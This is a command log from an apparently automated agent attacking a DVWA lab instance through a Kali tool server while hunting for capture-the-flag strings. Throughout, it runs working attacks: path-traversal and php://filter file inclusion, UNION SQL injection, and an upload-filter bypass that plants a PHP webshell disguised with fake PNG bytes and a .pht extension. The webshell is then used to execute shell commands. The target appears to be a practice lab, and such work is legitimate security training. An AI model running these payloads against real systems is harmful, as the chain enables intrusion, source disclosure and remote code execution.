re.DOTALL|re.IGNORECASE)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if m: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print(html.unescape(re.sub('&lt;[^&gt;]+&gt;','',m.group(1))))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" | head -40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2026-03-06 15:37:39,277 [INFO] 127.0.0.1 - - [06/Mar/2026 15:37:39] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:38:00,345 [INFO] Executing command: # View FI source for custom level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curl -s -b /tmp/s3.txt "http://100.113.75.28:8081/vulnerabilities/view_source.php?id=fi&amp;security=custom" \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| python3 -c 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import sys, re, html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 = sys.stdin.read()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blocks = re.findall(r'&lt;span style=\"color: #[0-9A-Fa-f]+\"&gt;(.*?)&lt;/span&gt;', c, re.DOTALL)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code = html.unescape(''.join(re.sub('&lt;[^&gt;]+&gt;','',b) for b in blocks))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print(code)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" | head -60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2026-03-06 15:38:00,418 [INFO] 127.0.0.1 - - [06/Mar/2026 15:38:00] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:38:17,542 [INFO] Executing command: # Get the rest of the FI source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curl -s -b /tmp/s3.txt "http://100.113.75.28:8081/vulnerabilities/view_source.php?id=fi&amp;security=custom" \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| python3 -c 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import sys, re, html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 = sys.stdin.read()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blocks = re.findall(r'&lt;span style=\"color: #[0-9A-Fa-f]+\"&gt;(.*?)&lt;/span&gt;', c, re.DOTALL)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code = html.unescape(''.join(re.sub('&lt;[^&gt;]+&gt;','',b) for b in blocks))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print(code)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" | tail -30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2026-03-06 15:38:17,669 [INFO] 127.0.0.1 - - [06/Mar/2026 15:38:17] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:38:23,725 [INFO] Executing command: # Test 1: Direct LFI with /etc/passwd (explicitly allowed)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curl -s -b /tmp/s3.txt \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"http://100.113.75.28:8081/vulnerabilities/fi/.?page=../../../etc/passwd" \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| grep -o "root:.*\|www-data:.*\|nobody:.*" | head -5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2026-03-06 15:38:23,843 [INFO] 127.0.0.1 - - [06/Mar/2026 15:38:23] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:38:27,707 [INFO] Executing command: # The ../  gets stripped. Try double URL encoding: ../ -&gt; %252e%252e%252f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 First encode: ../ -&gt; %2e%2e%2f  then encode the % -&gt; %25 giving %252e%252e%252f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curl -s -b /tmp/s3.txt \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"http://100.113.75.28:8081/vulnerabilities/fi/.?page=%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd" \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| grep -o "root:.*\|www-data:.*" | head -5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2026-03-06 15:38:27,743 [INFO] 127.0.0.1 - - [06/Mar/2026 15:38:27] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:38:32,421 [INFO] Executing command: # Try the explicitly-allowed path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curl -s -b /tmp/s3.txt \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"http://100.113.75.28:8081/vulnerabilities/fi/.?page=....//....//....//etc/passwd" \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| grep -oE "root:[^:]*:.*|www-data:.*" | head -3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 Also try with absolute path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curl -s -b /tmp/s3.txt \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"http://100.113.75.28:8081/vulnerabilities/fi/.?page=/etc/passwd" \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| grep -oE "root:[^:]*:.*|www-data:.*" | head -3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2026-03-06 15:38:32,685 [INFO] 127.0.0.1 - - [06/Mar/2026 15:38:32] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:39:10,692 [INFO] Executing command: # Try to read common flag locations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for PATH_GUESS in "/flag.txt" "/var/www/html/flag.txt" "/flag" "/root/flag.txt" "/var/www/flag.txt" "/tmp/flag.txt" "/etc/flag.txt"; do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RESULT=$(curl -s -b /tmp/s3.txt \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"http://100.113.75.28:8081/vulnerabilities/fi/.?page=$PATH_GUESS" \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| grep -oi "FLAG{[^}]*}")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if [ -n "$RESULT" ]; then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echo "FOUND at $PATH_GUESS: $RESULT"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echo "Not at $PATH_GUESS"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2026-03-06 15:39:10,917 [INFO] 127.0.0.1 - - [06/Mar/2026 15:39:10] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:39:15,007 [INFO] Executing command: # Try paths relative to the DVWA webroot - /var/www/html/ is standard Apache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for PATH_GUESS in "/var/www/html/dvwa/flag.txt" "/var/www/html/hackable/flag.txt" "/var/www/html/config/flag.txt" "/var/www/html/flag.txt" "/var/www/html/secret.txt" "/var/www/html/dvwa/secret.txt"; do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RESULT=$(curl -s -b /tmp/s3.txt \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"http://100.113.75.28:8081/vulnerabilities/fi/.?page=$PATH_GUESS" \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| grep -oi "FLAG{[^}]*}")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[ -n "$RESULT" ] &amp;&amp; echo "FOUND: $PATH_GUESS -&gt; $RESULT" || echo "Miss: $PATH_GUESS"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2026-03-06 15:39:15,177 [INFO] 127.0.0.1 - - [06/Mar/2026 15:39:15] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:39:19,345 [INFO] Executing command: # Use php://filter to read PHP files - this reveals source without executing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 Read the main config file to understand the webroot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curl -s -b /tmp/s3.txt \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"http://100.113.75.28:8081/vulnerabilities/fi/.?page=php://filter/convert.base64-encode/resource=/var/www/html/dvwa/includes/dvwaPage.inc.php" \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| grep -oE "[A-Za-z0-9+/]{20,}={0,2}" | head -3 | while read b64; do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echo "$b64" | base64 -d 2&gt;/dev/null | head -5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Exception in thread Thread-209 (_read_stdout):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File "/usr/lib/python3.13/threading.py", line 1043, in _bootstrap_inner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self.run()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~~~~~~~~^^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File "/usr/lib/python3.13/threading.py", line 994, in run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self._target(*self._args, **self._kwargs)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~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^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File "/usr/share/mcp-kali-server/kali_server.py", line 51, in _read_stdout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for line in iter(self.process.stdout.readline, ''):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~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^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File "&lt;frozen codecs&gt;", line 325, in decode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UnicodeDecodeError: 'utf-8' codec can't decode byte 0xfe in position 0: invalid start byte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2026-03-06 15:39:19,474 [INFO] 127.0.0.1 - - [06/Mar/2026 15:39:19] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:39:23,793 [INFO] Executing command: # Read the index.php to understand the webroot and find flag hints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curl -s -b /tmp/s3.txt \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"http://100.113.75.28:8081/vulnerabilities/fi/.?page=php://filter/convert.base64-encode/resource=/var/www/html/index.php" \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| grep -oE "[A-Za-z0-9+/]{100,}={0,2}" | head -1 | base64 -d 2&gt;/dev/null | grep -i "flag\|secret\|hidden" | head -5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2026-03-06 15:39:23,861 [INFO] 127.0.0.1 - - [06/Mar/2026 15:39:23] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:39:29,143 [INFO] Executing command: # Read the setup.php and config files to find flag or clues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curl -s -b /tmp/s3.txt \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"http://100.113.75.28:8081/vulnerabilities/fi/.?page=php://filter/convert.base64-encode/resource=/var/www/html/config/config.inc.php" \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| grep -oE "[A-Za-z0-9+/]{100,}={0,2}" | head -1 | base64 -d 2&gt;/dev/null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2026-03-06 15:39:29,179 [INFO] 127.0.0.1 - - [06/Mar/2026 15:39:29] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:39:36,809 [INFO] Executing command: # Let's read the setup.php since it was publicly accessible and might reveal flag location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curl -s -b /tmp/s3.txt \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"http://100.113.75.28:8081/vulnerabilities/fi/.?page=php://filter/convert.base64-encode/resource=/var/www/html/setup.php" \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| grep -oE "[A-Za-z0-9+/]{100,}={0,2}" | head -1 | base64 -d 2&gt;/dev/null | grep -i "flag\|secret\|hidden\|insert\|FLAG" | head -10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2026-03-06 15:39:36,877 [INFO] 127.0.0.1 - - [06/Mar/2026 15:39:36] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:40:15,312 [INFO] Executing command: # Read the database setup SQL to see if flag is inserted into DB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curl -s -b /tmp/s3.txt \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"http://100.113.75.28:8081/vulnerabilities/fi/.?page=php://filter/convert.base64-encode/resource=/var/www/html/database/dvwa.sql" \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| grep -oE "[A-Za-z0-9+/]{100,}={0,2}" | head -1 | base64 -d 2&gt;/dev/null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2026-03-06 15:40:15,381 [INFO] 127.0.0.1 - - [06/Mar/2026 15:40:15] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:40:19,605 [INFO] Executing command: # List contents of the database directory via LFI reading directory listings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 First, find the webroot structure - read the Apache config or directory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curl -s -b /tmp/s3.txt \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"http://100.113.75.28:8081/vulnerabilities/fi/.?page=/etc/apache2/sites-enabled/000-default.conf" \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| grep -oE "Document\w+\s+[^\s&lt;]+" | head -5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curl -s -b /tmp/s3.txt \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"http://100.113.75.28:8081/vulnerabilities/fi/.?page=/etc/apache2/sites-enabled/dvwa.conf" \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| grep -oE "Document\w+\s+[^\s&lt;]+" | head -5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2026-03-06 15:40:19,724 [INFO] 127.0.0.1 - - [06/Mar/2026 15:40:19] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:40:28,995 [INFO] Executing command: # Webroot is /var/www/html. Let me check the custom vulnerability source files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 Read the sqli custom source directly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curl -s -b /tmp/s3.txt \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"http://100.113.75.28:8081/vulnerabilities/fi/.?page=php://filter/convert.base64-encode/resource=/var/www/html/vulnerabilities/sqli/source/custom.php" \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| grep -oE "[A-Za-z0-9+/]{100,}={0,2}" | head -1 | base64 -d 2&gt;/dev/null | grep -i "flag\|secret\|FLAG" | head -5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2026-03-06 15:40:29,071 [INFO] 127.0.0.1 - - [06/Mar/2026 15:40:29] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:41:11,249 [INFO] Executing command: # Read the full sqli custom.php looking for flag injection in SQL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curl -s -b /tmp/s3.txt \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"http://100.113.75.28:8081/vulnerabilities/fi/.?page=php://filter/convert.base64-encode/resource=/var/www/html/vulnerabilities/sqli/source/custom.php" \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| grep -oE "[A-Za-z0-9+/]{100,}={0,2}" | head -1 | base64 -d 2&gt;/dev/null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2026-03-06 15:41:11,320 [INFO] 127.0.0.1 - - [06/Mar/2026 15:41:11] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:41:21,382 [INFO] Executing command: # Check all custom PHP files in the vulnerabilities directory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for VULN in "fi" "upload" "exec" "sqli"; do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echo "=== $VULN ==="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curl -s -b /tmp/s3.txt \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"http://100.113.75.28:8081/vulnerabilities/fi/.?page=php://filter/convert.base64-encode/resource=/var/www/html/vulnerabilities/$VULN/source/custom.php" \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| grep -oE "[A-Za-z0-9+/]{50,}={0,2}" | head -1 | base64 -d 2&gt;/dev/null | grep -i "flag\|FLAG\|secret\|hidden" | head -3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2026-03-06 15:41:21,557 [INFO] 127.0.0.1 - - [06/Mar/2026 15:41:21] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:41:26,183 [INFO] Executing command: # Read the upload custom.php completely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curl -s -b /tmp/s3.txt \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"http://100.113.75.28:8081/vulnerabilities/fi/.?page=php://filter/convert.base64-encode/resource=/var/www/html/vulnerabilities/upload/source/custom.php" \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| grep -oE "[A-Za-z0-9+/]{100,}={0,2}" | head -1 | base64 -d 2&gt;/dev/null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2026-03-06 15:41:26,253 [INFO] 127.0.0.1 - - [06/Mar/2026 15:41:26] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:42:31,750 [INFO] Executing command: # The extension check uses pathinfo() which returns LAST extension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# .php.jpg would have extension 'jpg' - bypasses the PHP block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# But then it won't execute as PHP... unless Apache is configured to execute .jpg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# Better: use .pht or .shtml or other PHP-executing extensions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# Check what Apache config allows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curl -s -b /tmp/s3.txt \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"http://100.113.75.28:8081/vulnerabilities/fi/.?page=/etc/apache2/mods-enabled/php8.5.conf" \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| grep -v "^$\|html\|body\|div\|css\|meta\|script\|link\|title" | head -20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curl -s -b /tmp/s3.txt \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"http://100.113.75.28:8081/vulnerabilities/fi/.?page=/etc/apache2/mods-available/php8.5.conf" \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| grep -v "^$\|html\|body\|div\|css\|meta\|script\|link\|title" | head -20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2026-03-06 15:42:31,950 [INFO] 127.0.0.1 - - [06/Mar/2026 15:42:31] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:42:36,922 [INFO] Executing command: # The FI module wraps the included file in DVWA template - I'm already getting LFI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 Let me try to find the flag by reading the setup.php SQL file or database init scripts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curl -s -b /tmp/s3.txt \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"http://100.113.75.28:8081/vulnerabilities/fi/.?page=php://filter/convert.base64-encode/resource=/var/www/html/database/dvwa.sql" \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| grep -oE "[A-Za-z0-9+/]{50,}={0,2}" | head -2 | while read b64; do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echo "$b64" | base64 -d 2&gt;/dev/null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done | grep -i "flag\|FLAG\|insert" | head -10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2026-03-06 15:42:36,988 [INFO] 127.0.0.1 - - [06/Mar/2026 15:42:36] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:42:43,176 [INFO] Executing command: # Search for a flag-related file using the SQL injection to query the DB with LOAD_FILE for mysql-files dir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 Instead, let's use SQLi to query information_schema for any flag table across all databases including mysql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curl -s -b /tmp/s3.txt -G \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--data-urlencode "id=999' UNION SELECT concat(table_schema,'.',table_name),2,3,4 FROM information_schema.tables WHERE table_name LIKE '%flag%' OR table_name LIKE '%secret%' OR table_name LIKE '%hidden%'-- -" \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--data-urlencode "Submit=Submit" \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--data-urlencode "role=admin" \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"http://100.113.75.28:8081/vulnerabilities/sqli/" \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| grep "&lt;td&gt;" | grep -v "^.*&lt;td&gt;[234]&lt;/td&gt;" | sed 's/.*&lt;td&gt;\(.*\)&lt;\/td&gt;.*/\1/' | grep -v "^[234]$"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2026-03-06 15:42:43,443 [INFO] 127.0.0.1 - - [06/Mar/2026 15:42:43] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:42:47,802 [INFO] Executing command: # Refresh session first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curl -s -c /tmp/s4.txt "http://100.113.75.28:8081/login.php" &gt; /tmp/lp4.html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T4=$(grep "user_token" /tmp/lp4.html | grep -o "value='[^']*'" | sed "s/value='\([^']*\)'/\1/")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curl -s -c /tmp/s4.txt -b /tmp/s4.txt \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-d "username=admin&amp;password=password&amp;Login=Login&amp;user_token=$T4" \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"http://100.113.75.28:8081/login.php" -o /dev/null -D /tmp/h4.txt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grep "Location" /tmp/h4.txt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2026-03-06 15:42:47,922 [INFO] 127.0.0.1 - - [06/Mar/2026 15:42:47] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:42:54,035 [INFO] Executing command: # Query for any table with flag/secret/hidden across ALL databases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curl -s -b /tmp/s4.txt -G \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--data-urlencode "id=999' UNION SELECT concat(table_schema,'.',table_name),2,3,4 FROM information_schema.tables WHERE table_name LIKE '%flag%' OR table_name LIKE '%secret%'-- -" \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--data-urlencode "Submit=Submit" \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--data-urlencode "role=admin" \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"http://100.113.75.28:8081/vulnerabilities/sqli/" \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| grep "&lt;td&gt;" | sed 's/.*&lt;td&gt;\(.*\)&lt;\/td&gt;.*/\1/' | grep -v "^[234]$"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2026-03-06 15:42:54,156 [INFO] 127.0.0.1 - - [06/Mar/2026 15:42:54] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:43:55,470 [INFO] Executing command: cat /tmp/s4.txt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2026-03-06 15:43:55,514 [INFO] 127.0.0.1 - - [06/Mar/2026 15:43:55] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:44:00,193 [INFO] Executing command: SID="4ef829abe6ac7ed0f829d9efa24260d0"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curl -s -b "security=custom;PHPSESSID=$SID" -G \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--data-urlencode "id=999' UNION SELECT concat(table_schema,'.',table_name),2,3,4 FROM information_schema.tables WHERE table_name LIKE '%flag%' OR table_name LIKE '%secret%'-- -" \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--data-urlencode "Submit=Submit" \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--data-urlencode "role=admin" \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"http://100.113.75.28:8081/vulnerabilities/sqli/" \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| grep "&lt;td&gt;" | sed 's/.*&lt;td&gt;\(.*\)&lt;\/td&gt;.*/\1/' | grep -v "^[234]$"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2026-03-06 15:44:00,264 [INFO] 127.0.0.1 - - [06/Mar/2026 15:44:00] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:45:12,684 [INFO] Executing command: SID="4ef829abe6ac7ed0f829d9efa24260d0"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curl -v -b "security=custom;PHPSESSID=$SID" \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"http://100.113.75.28:8081/vulnerabilities/sqli/?id=1&amp;Submit=Submit&amp;role=admin&amp;debug=1" 2&gt;&amp;1 | grep -E "HTTP|Location|pre&gt;" | head -10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2026-03-06 15:45:12,871 [INFO] 127.0.0.1 - - [06/Mar/2026 15:45:12] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:45:17,614 [INFO] Executing command: SID="4ef829abe6ac7ed0f829d9efa24260d0"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 URL encode the LIKE query carefully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PAYLOAD="999' UNION SELECT concat(table_schema,0x2e,table_name),2,3,4 FROM information_schema.tables WHERE table_name LIKE 0x25666c6167-- -"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# 0x25666c6167 = %flag in hex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"http://100.113.75.28:8081/vulnerabilities/sqli/?id=$(python3 -c "import urllib.parse; print(urllib.parse.quote(\"$PAYLOAD\"))")&amp;Submit=Submit&amp;role=admin&amp;debug=1" \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| grep "&lt;td&gt;" | sed 's/.*&lt;td&gt;\(.*\)&lt;\/td&gt;.*/\1/' | grep -v "^[234]$" | head -10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2026-03-06 15:45:17,836 [INFO] 127.0.0.1 - - [06/Mar/2026 15:45:17] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:45:28,501 [INFO] Executing command: SID="4ef829abe6ac7ed0f829d9efa24260d0"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 Try the access_log - might store flag-retrieval events. Also try reading guestbook entries fully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# And check if there's a flag in the access_log action column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"http://100.113.75.28:8081/vulnerabilities/sqli/?id=999%27%20UNION%20SELECT%20action%2C2%2C3%2C4%20FROM%20access_log--+-&amp;Submit=Submit&amp;role=admin" \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| grep "&lt;td&gt;" | sed 's/.*&lt;td&gt;\(.*\)&lt;\/td&gt;.*/\1/' | grep -v "^[234]$" | head -10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2026-03-06 15:45:28,573 [INFO] 127.0.0.1 - - [06/Mar/2026 15:45:28] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:46:43,254 [INFO] Executing command: SID="4ef829abe6ac7ed0f829d9efa24260d0"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# Let me try the File Upload + LFI chain since upload source showed the flag might be somewhere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# First, let's read the PHP files that create the flag to find where it IS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# Read the about.php (no auth needed) for any flag hints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"http://100.113.75.28:8081/vulnerabilities/fi/.?page=php://filter/convert.base64-encode/resource=/var/www/html/about.php" \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| grep -oE "[A-Za-z0-9+/]{100,}={0,2}" | head -1 | base64 -d 2&gt;/dev/null | grep -i "flag\|FLAG\|secret\|hidden" | head -5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2026-03-06 15:46:43,379 [INFO] 127.0.0.1 - - [06/Mar/2026 15:46:43] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:46:51,573 [INFO] Executing command: SID="4ef829abe6ac7ed0f829d9efa24260d0"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# Let me read index.php fully - it contains the flag challenge text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"http://100.113.75.28:8081/vulnerabilities/fi/.?page=php://filter/convert.base64-encode/resource=/var/www/html/index.php" \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| grep -oE "[A-Za-z0-9+/]{100,}={0,2}" | head -1 | base64 -d 2&gt;/dev/null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2026-03-06 15:46:51,648 [INFO] 127.0.0.1 - - [06/Mar/2026 15:46:51] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:47:01,697 [INFO] Executing command: SID="4ef829abe6ac7ed0f829d9efa24260d0"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# Let me use the File Upload + LFI chain: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# Upload a PHP webshell (bypass upload filters), then include via LFI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# The upload filter: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# - MIME must start with "image/"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# - Magic bytes: PNG check at WRONG offset (offset 1, not 0) - so \x00PNG passes!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# - Extension: blocks php/phar/phtml/php1-9 but NOT .pht or other variants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# BUT extension regex is: /ph(ar|p|tml|p[1-9])/i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# .pht doesn't match! Let me check: ph + t -&gt; not in (ar|p|tml|p[1-9]) -&gt; .pht PASSES!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# Create webshell with .pht extension + fake PNG magic bytes (at offset 1)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# \x00PNG&lt;webshell code&gt;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python3 -c "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# Fake PNG: put a null byte then PNG - so substr(\$bytes, 1, 3) === 'PNG' is TRUE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payload = b'\x00PNG\r\n\x1a\n' + b'&lt;?php system(\$_GET[\"cmd\"]); ?&gt;'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sys.stdout.buffer.write(payload)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" &gt; /tmp/shell.pht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echo "File created:"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xxd /tmp/shell.pht | head -3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2026-03-06 15:47:01,766 [INFO] 127.0.0.1 - - [06/Mar/2026 15:47:01] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:48:33,778 [INFO] Executing command: SID="4ef829abe6ac7ed0f829d9efa24260d0"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# Upload the .pht webshell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UPLOAD_RESULT=$(curl -s -b "security=custom;PHPSESSID=$SID" \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-F "uploaded=@/tmp/shell.pht;type=image/png;filename=shell.pht" \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-F "Upload=Upload" \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"http://100.113.75.28:8081/vulnerabilities/upload/")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echo "$UPLOAD_RESULT" | grep -i "upload\|reject\|success\|debug\|error\|path\|hackable" | head -15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2026-03-06 15:48:33,896 [INFO] 127.0.0.1 - - [06/Mar/2026 15:48:33] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:48:38,828 [INFO] Executing command: SID="4ef829abe6ac7ed0f829d9efa24260d0"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SHELL_PATH="/var/www/html/hackable/uploads/custom_${SID}/img_a27aa77ee4.pht"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# Execute via LFI + webshell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"http://100.113.75.28:8081/vulnerabilities/fi/.?page=${SHELL_PATH}&amp;cmd=id" \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| grep -oE "uid=[0-9]+\([^)]+\)[^\n&lt;]*" | head -3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2026-03-06 15:48:38,950 [INFO] 127.0.0.1 - - [06/Mar/2026 15:48:38] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:48:42,230 [INFO] Executing command: SID="4ef829abe6ac7ed0f829d9efa24260d0"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SHELL_PATH="/var/www/html/hackable/uploads/custom_${SID}/img_a27aa77ee4.pht"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"http://100.113.75.28:8081/vulnerabilities/fi/.?page=${SHELL_PATH}&amp;cmd=id" \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| strings | grep -i "uid\|www\|apache\|root" | head -5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2026-03-06 15:48:42,299 [INFO] 127.0.0.1 - - [06/Mar/2026 15:48:42] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:48:47,164 [INFO] Executing command: SID="4ef829abe6ac7ed0f829d9efa24260d0"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SHELL_PATH="/var/www/html/hackable/uploads/custom_${SID}/img_a27aa77ee4.pht"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rce() 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curl -s -b "security=custom;PHPSESSID=$SID" \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--data-urlencode "cmd=$1" \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"http://100.113.75.28:8081/vulnerabilities/fi/.?page=${SHELL_PATH}" \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| strings | head -5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# Find flag files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rce "find / -name '*flag*' -not -path '*/proc/*' -not -path '*/sys/*' 2&gt;/dev/null"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2026-03-06 15:48:47,238 [INFO] 127.0.0.1 - - [06/Mar/2026 15:48:47] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:48:54,035 [INFO] Executing command: SID="4ef829abe6ac7ed0f829d9efa24260d0"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SHELL_PATH="/var/www/html/hackable/uploads/custom_${SID}/img_a27aa77ee4.pht"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# Use GET parameter properly (need to append as query string to the page include)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# The issue is the FI page includes the file, so cmd needs to be part of $_GET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# Let me pass cmd as a URL parameter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"http://100.113.75.28:8081/vulnerabilities/fi/.?page=${SHELL_PATH}&amp;cmd=find+%2F+-name+%27*flag*%27+-not+-path+%27*proc*%27+-not+-path+%27*sys*%27+2%3E%2Fdev%2Fnull" \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| strings | grep -v "Warning\|Deprecated\|Cannot\|header\|dvwa\|inc.php" | head -15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2026-03-06 15:48:55,069 [INFO] 127.0.0.1 - - [06/Mar/2026 15:48:55] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:50:41,747 [INFO] Executing command: SID="4ef829abe6ac7ed0f829d9efa24260d0"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SHELL_PATH="/var/www/html/hackable/uploads/custom_${SID}/img_a27aa77ee4.pht"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# List the flags directory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"http://100.113.75.28:8081/vulnerabilities/fi/.?page=${SHELL_PATH}&amp;cmd=ls+-la+/var/www/html/hackable/flags/" \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| strings | grep -v "Warning\|Deprecated\|Cannot\|header\|dvwa\|inc.php\|&lt;" | head -15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2026-03-06 15:50:41,871 [INFO] 127.0.0.1 - - [06/Mar/2026 15:50:41] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:50:45,091 [INFO] Executing command: SID="4ef829abe6ac7ed0f829d9efa24260d0"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SHELL_PATH="/var/www/html/hackable/uploads/custom_${SID}/img_a27aa77ee4.pht"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# Read the fi.php flag file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"http://100.113.75.28:8081/vulnerabilities/fi/.?page=${SHELL_PATH}&amp;cmd=cat+/var/www/html/hackable/flags/fi.php" \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| strings | grep -v "Warning\|Deprecated\|Cannot\|header\|dvwa\|inc.php\|^&lt;" | head -20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2026-03-06 15:50:45,241 [INFO] 127.0.0.1 - - [06/Mar/2026 15:50:45] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:52:42,007 [INFO] Executing command: SID="4ef829abe6ac7ed0f829d9efa24260d0"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SHELL_PATH="/var/www/html/hackable/uploads/custom_${SID}/img_a27aa77ee4.pht"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# The fi.php is a PHP file - when included it executes, not shows content.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# Use cat via shell to read the raw content, or use LFI with php://filter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# Method 1: cat the file (raw content via RCE)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"http://100.113.75.28:8081/vulnerabilities/fi/.?page=${SHELL_PATH}&amp;cmd=cat%20/var/www/html/hackable/flags/fi.php" \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| strings | grep -iE "FLAG\{|flag\{" | head -5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2026-03-06 15:52:42,078 [INFO] 127.0.0.1 - - [06/Mar/2026 15:52:42] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:52:48,638 [INFO] Executing command: SID="4ef829abe6ac7ed0f829d9efa24260d0"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# Use php://filter via LFI to read fi.php without executing it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"http://100.113.75.28:8081/vulnerabilities/fi/.?page=php://filter/convert.base64-encode/resource=/var/www/html/hackable/flags/fi.php" \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| grep -oE "[A-Za-z0-9+/]{50,}={0,2}" | while read b64; do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echo "$b64" | base64 -d 2&gt;/dev/null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done | grep -i "FLAG\|flag" | head -5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2026-03-06 15:52:48,729 [INFO] 127.0.0.1 - - [06/Mar/2026 15:52:48] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:52:52,418 [INFO] Executing command: SID="4ef829abe6ac7ed0f829d9efa24260d0"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# Read the full file content via php filter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"http://100.113.75.28:8081/vulnerabilities/fi/.?page=php://filter/convert.base64-encode/resource=/var/www/html/hackable/flags/fi.php" \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| grep -oE "[A-Za-z0-9+/]+=*" | sort -u | awk 'length&gt;30' | while read b64; do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decoded=$(echo "$b64" | base64 -d 2&gt;/dev/null)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[ $? -eq 0 ] &amp;&amp; echo "$decoded"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done | head -30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2026-03-06 15:52:52,540 [INFO] 127.0.0.1 - - [06/Mar/2026 15:52:52] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:52:57,947 [INFO] Executing command: # Decode the concatenated base64 line4 from fi.php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echo "NC4pI" "FRoZSBwb29s" "IG9uIH" "RoZSByb29mIG1" "1c3QgaGF" "2ZSBh" "IGxlY" "Wsu" | tr -d ' ' | base64 -d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2026-03-06 15:52:57,966 [INFO] 127.0.0.1 - - [06/Mar/2026 15:52:57] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:55:08,801 [INFO] Executing command: SID="4ef829abe6ac7ed0f829d9efa24260d0"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# The fi.php says "Use the file include next time!" and contains clues.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# The ACTUAL flag might be revealed when this file is INCLUDED (not filtered/read).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# Let's include it directly through the FI module.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"http://100.113.75.28:8081/vulnerabilities/fi/.?page=/var/www/html/hackable/flags/fi.php" \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| grep -iE "FLAG\{|flag\{|Bond\|Sherlock\|Romeo\|pool\|zeroes" | head -10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2026-03-06 15:55:08,874 [INFO] 127.0.0.1 - - [06/Mar/2026 15:55:08] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:55:14,566 [INFO] Executing command: SID="4ef829abe6ac7ed0f829d9efa24260d0"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# Include the fi.php file via the FI vulnerability - shows content when included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"http://100.113.75.28:8081/vulnerabilities/fi/.?page=/var/www/html/hackable/flags/fi.php" \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| strings | grep -v "^&lt;\|css\|js\|menu\|header\|body\|div\|container\|img" | head -30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2026-03-06 15:55:14,699 [INFO] 127.0.0.1 - - [06/Mar/2026 15:55:14] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:55:21,460 [INFO] Executing command: SID="4ef829abe6ac7ed0f829d9efa24260d0"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# The fi.php file is the intended path but it's a clue file, not the flag itself.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# Notice: "Use the file include next time!" - this IS the file inclusion challenge answer.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# The HTML comment contains: "5.) The world isn't run by weapons..."  (WarGames quote)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# These are all movie/book quotes as distractors.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# Let me check if there's a FLAG in the HTML comment area or if fi.php contains FLAG{}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"http://100.113.75.28:8081/vulnerabilities/fi/.?page=/var/www/html/hackable/flags/fi.php" \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| grep -c "FLAG\|flag{"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# Also check the full page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"http://100.113.75.28:8081/vulnerabilities/fi/.?page=/var/www/html/hackable/flags/fi.php" &gt; /tmp/fi_flag_page.html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grep -oi "FLAG{[^}]*}" /tmp/fi_flag_page.html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2026-03-06 15:55:21,579 [INFO] 127.0.0.1 - - [06/Mar/2026 15:55:21] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:55:27,261 [INFO] Executing command: SID="4ef829abe6ac7ed0f829d9efa24260d0"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SHELL_PATH="/var/www/html/hackable/uploads/custom_${SID}/img_a27aa77ee4.pht"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# Use RCE to do a comprehensive search for the flag string on the filesystem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"http://100.113.75.28:8081/vulnerabilities/fi/.?page=${SHELL_PATH}&amp;cmd=grep+-r+%22FLAG%7B%22+/var/www/html/+2%3E/dev/null" \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| strings | grep -i "FLAG{" | head -10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2026-03-06 15:55:27,327 [INFO] 127.0.0.1 - - [06/Mar/2026 15:55:27] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:55:32,367 [INFO] Executing command: SID="4ef829abe6ac7ed0f829d9efa24260d0"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SHELL_PATH="/var/www/html/hackable/uploads/custom_${SID}/img_a27aa77ee4.pht"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# Broader grep - case insensitive, search all files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OUTPUT=$(curl -s -b "security=custom;PHPSESSID=$SID" \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"http://100.113.75.28:8081/vulnerabilities/fi/.?page=${SHELL_PATH}&amp;cmd=grep%20-ri%20%22FLAG%7B%22%20%2Fvar%2Fwww%2F%202%3E%2Fdev%2Fnull%20%7C%20head%20-20")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echo "$OUTPUT" | strings | grep -v "Warning\|Deprecated\|Cannot\|header\|dvwa\|inc.php" | head -20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2026-03-06 15:55:32,438 [INFO] 127.0.0.1 - - [06/Mar/2026 15:55:32] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:58:01,257 [INFO] Executing command: 